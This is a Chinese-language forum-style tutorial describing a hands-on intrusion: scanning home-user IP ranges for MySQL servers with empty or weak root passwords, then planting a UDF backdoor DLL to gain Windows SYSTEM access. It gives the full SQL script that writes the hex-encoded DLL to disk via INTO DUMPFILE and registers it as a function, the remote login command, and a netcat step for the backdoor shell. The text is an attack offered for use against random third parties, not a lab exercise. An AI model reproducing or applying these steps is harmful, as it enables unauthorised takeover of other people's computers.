通过mysql弱口令取得windows的system权限的实战

mix在幻影论坛公布了一篇关于mysql入侵的文章(<<Windows环境下通过MySQL以SYSTEM身份执行系统命令>>,连接地址http://www.ph4nt0m.org/bbs/showthread.php?threadid=33006),反应强烈.随后不久,黑客基地古典辣m做了个演示动画,可惜其中的用到mysql.txt并没有公布,造成很多不熟悉mysql的人不能实战入侵mysql.

    其实通过注册mysql 的UDF DLL中自写的Function而执行任意命令早在去年12月已经公布了,参看文章http://www.ph4nt0m.org/bbs/showthread.php?s=&threadid=33331;而mix实现直接从mysql客户端传送二进制文件进入服务端硬盘中,不得不说是一个了不起的发现!下面我来说说我的入侵实战!

    1.打开hscan1.2扫描一段ip,我推荐大家扫描个人电脑所在的ip段,因为这些段ip的主人安全意思差,从而能扫到较多的mysql的root口令为空且有访问mysql默认数据库mysql的权限.

    2.在自己的机器上装个mysql for windows.下载地址ttp://download.pchome.net/internet/server/dbserver/2506.html

    3.在幻影论坛下载个my_udf.dll或者mix.dll(我比较偏好my_udf.dll,因为mix.dll会造成mysql假死).

    4.运行winhex,打开my_udf.dll,点edit菜单下面的copy all选hex values;打开记事本,点粘贴,这样就把十六进制的my_udf.dll复制进去了!

    5.再打开另外个记事本写入如下语句:
     use mysql;
     set @a=concat('',0x...)
     create table Mix(data LONGBLOB);
     insert into Mix values("");update Mix set data = @a;
     select data from Mix into DUMPFILE 'c:\\my_udf.dll';
     CREATE FUNCTION my_udfdoor RETURNS STRING SONAME 'c:\\my_udf.dll';
     select my_udfdoor('');

    6.把第四步中记事本上的十六进制数据复制出来替换掉第5步中第二行语句中的"...",并保存到c盘根目录下面,命名为mysql.txt.

    7.在本地打开一个dos命令窗口,跳转到mysql安装目录下面,输入mysql -h218.1.1.1 -uroot -p123
(注意,把218.1.1.1,root,123分别替换为你的hscan扫描到的ip,username,password的值.如果password的值为空,则可以不需要参数-p);

    8.在第7步中连接成功远程mysql服务器的话,就输入 \. c:\mysql.txt并敲一下回车.如果远程mysql是运行在windows操作系统下的且你扫描到的mysql帐号权限足够高的话,就会成功在远程服务器上装上你的后门.

    9.最后用nc来连接此服务器的3306端口,并输入密码fuck,按回车,如果shell没有出来,就多敲几次回车.如果还是不出shell,那就换个目标试一试吧.